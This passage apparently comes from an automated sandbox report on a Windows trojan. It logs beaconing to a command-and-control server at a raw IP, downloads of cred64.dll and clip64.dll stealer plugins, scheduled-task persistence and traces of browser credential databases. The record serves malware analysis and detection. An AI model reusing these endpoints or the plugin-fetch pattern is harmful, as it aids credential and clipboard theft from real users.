r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: Joe Sandbox ViewIP Address: 193.233.132.56 193.233.132.56
                                Source: Joe Sandbox ViewASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeCode function: 0_2_00E1D8D0 recv,recv,recv,recv,0_2_00E1D8D0
                                Source: global trafficHTTP traffic detected: GET /Pneh2sXQk0/Plugins/cred64.dll HTTP/1.1Host: 193.233.132.56
                                Source: global trafficHTTP traffic detected: GET /Pneh2sXQk0/Plugins/clip64.dll HTTP/1.1Host: 193.233.132.56
                                Source: unknownHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: explorha.exe, 00000006.00000002.3041565537.0000000000CA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/
                                Source: explorha.exe, 00000006.00000002.3041565537.0000000000CA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/CoreCommonProxyStub.dll
                                Source: explorha.exe, 00000006.00000002.3041565537.0000000000C75000.00000004.00000020.00020000.00000000.sdmp, explorha.exe, 00000006.00000002.3041565537.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, explorha.exe, 00000006.00000002.3041565537.0000000000C48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/Pneh2sXQk0/Plugins/clip64.dll
                                Source: explorha.exe, 00000006.00000002.3041565537.0000000000C75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/Pneh2sXQk0/Plugins/clip64.dllv
                                Source: explorha.exe, 00000006.00000002.3041565537.0000000000C48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/Pneh2sXQk0/Plugins/cred64.dll
                                Source: explorha.exe, 00000006.00000002.3041565537.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2440652752.00000256D1295000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3037845134.0000000002D9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php
                                Source: rundll32.exe, 00000008.00000002.2440652752.00000256D1295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php-
                                Source: explorha.exe, 00000006.00000002.3041565537.0000000000CA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php2
                                Source: explorha.exe, 00000006.00000002.3041565537.0000000000C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php27
                                Source: explorha.exe, 00000006.00000002.3041565537.0000000000CA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php3
                                Source: explorha.exe, 00000006.00000002.3041565537.0000000000C1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php6
                                Source: rundll32.exe, 00000008.00000002.2440937016.00000256D313A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1
                                Source: rundll32.exe, 00000008.00000002.2440652752.00000256D1263000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1;BU)(A;OICI;GXGR;;;WD)D
                                Source: rundll32.exe, 00000008.00000002.2440937016.00000256D313A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1s
                                Source: explorha.exe, 00000006.00000002.3041565537.0000000000C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpd
                                Source: explorha.exe, 00000006.00000002.3041565537.0000000000C75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpded
                                Source: explorha.exe, 00000006.00000002.3041565537.0000000000CA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpg
                                Source: explorha.exe, 00000006.00000002.3041565537.0000000000CA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpk
                                Source: explorha.exe, 00000006.00000002.3041565537.0000000000CA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/ferences.SourceAumid
                                Source: explorha.exe, 00000006.00000002.3041565537.0000000000CA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/l
                                Source: powershell.exe, 0000000C.00000002.2422508148.000001A3CB17A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2404276888.000001A3BC9E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                Source: powershell.exe, 0000000C.00000002.2404276888.000001A3BB339000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                Source: powershell.exe, 0000000C.00000002.2404276888.000001A3BB339000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                Source: powershell.exe, 0000000C.00000002.2404276888.000001A3BB111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: powershell.exe, 0000000C.00000002.2404276888.000001A3BB339000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                Source: powershell.exe, 0000000C.00000002.2404276888.000001A3BB339000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                Source: powershell.exe, 0000000C.00000002.2404276888.000001A3BB111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                Source: powershell.exe, 0000000C.00000002.2404276888.000001A3BB339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2404276888.000001A3BC6E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2404276888.000001A3BC740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                                Source: powershell.exe, 0000000C.00000002.2404276888.000001A3BC740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
                                Source: powershell.exe, 0000000C.00000002.2404276888.000001A3BC9E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                Source: powershell.exe, 0000000C.00000002.2404276888.000001A3BC9E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                Source: powershell.exe, 0000000C.00000002.2404276888.000001A3BC9E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                Source: powershell.exe, 0000000C.00000002.2404276888.000001A3BB339000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                Source: powershell.exe, 0000000C.00000002.2422508148.000001A3CB17A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2404276888.000001A3BC9E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                                System Summary

                                barindex
                                PE file contains section with special chars
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeStatic PE information: section name:
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeStatic PE information: section name: .idata
                                Source: explorha.exe.0.drStatic PE information: section name:
                                Source: explorha.exe.0.drStatic PE information: section name: .idata
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 6_2_0087E227 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,6_2_0087E227
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeFile created: C:\Windows\Tasks\explorha.jobJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeCode function: 0_2_00E15DC80_2_00E15DC8
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeCode function: 0_2_00E5A2200_2_00E5A220
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeCode function: 0_2_00E14E600_2_00E14E60
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 1_2_008AA2201_2_008AA220
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 1_2_008A43301_2_008A4330
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 1_2_008994E31_2_008994E3
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 1_2_008A8DBB1_2_008A8DBB
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 1_2_008A8EDB1_2_008A8EDB
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 1_2_008A86691_2_008A8669
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 1_2_00864E601_2_00864E60
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 1_2_008A47C81_2_008A47C8
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_008AA2202_2_008AA220
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_008A43302_2_008A4330
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_008994E32_2_008994E3
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_008A8DBB2_2_008A8DBB
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_008A8EDB2_2_008A8EDB
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_008A86692_2_008A8669
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_00864E602_2_00864E60
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_008A47C82_2_008A47C8
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 6_2_008AA2206_2_008AA220
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 6_2_008A43306_2_008A4330
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 6_2_008854816_2_00885481
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 6_2_008824A36_2_008824A3
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 6_2_008994E36_2_008994E3
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 6_2_009896806_2_00989680
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 6_2_008A86696_2_008A8669
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 6_2_008A47C86_2_008A47C8
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 6_2_008878226_2_00887822
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 6_2_00882C926_2_00882C92
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 6_2_008A8DBB6_2_008A8DBB
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 6_2_008A8EDB6_2_008A8EDB
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 6_2_00864E606_2_00864E60
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll 3C97BB410E49B11AF8116FEB7240B7101E1967CAE7538418C45C3D2E072E8103
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll 12FEF2D5995D671EC0E91BDBDC91E2B0D3C90ED3A8B2B13DDAA8AD64727DCD46
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeCode function: String function: 00E29750 appears 122 times
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: String function: 0089A433 appears 46 times
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: String function: 0087ECE3 appears 75 times
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: String function: 0087F620 appears 81 times
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: String function: 0087EFE2 appears 83 times
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: String function: 00879750 appears 367 times
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeStatic PE information: Section: ZLIB complexity 0.9981358914209115
                                Source: explorha.exe.0.drStatic PE information: Section: ZLIB complexity 0.9981358914209115
                                Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@17/21@0/1
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile created: C:\Users\user\AppData\Roaming\a091ec0a6e2227Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6916:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2208:120:WilError_03
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeFile created: C:\Users\user\AppData\Local\Temp\09fd851a4fJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeFile read: C:\Users\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                                Source: cred64[1].dll.6.dr, cred64.dll.6.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                                Source: cred64[1].dll.6.dr, cred64.dll.6.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                                Source: cred64[1].dll.6.dr, cred64.dll.6.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                                Source: cred64[1].dll.6.dr, cred64.dll.6.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                                Source: cred64[1].dll.6.dr, cred64.dll.6.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                                Source: cred64[1].dll.6.dr, cred64.dll.6.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                                Source: rundll32.exe, 00000008.00000002.2440652752.00000256D11F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                Source: cred64[1].dll.6.dr, cred64.dll.6.drBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeReversingLabs: Detection: 44%
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeVirustotal: Detection: 54%
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                Source: explorha.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                Source: explorha.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                Source: explorha.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
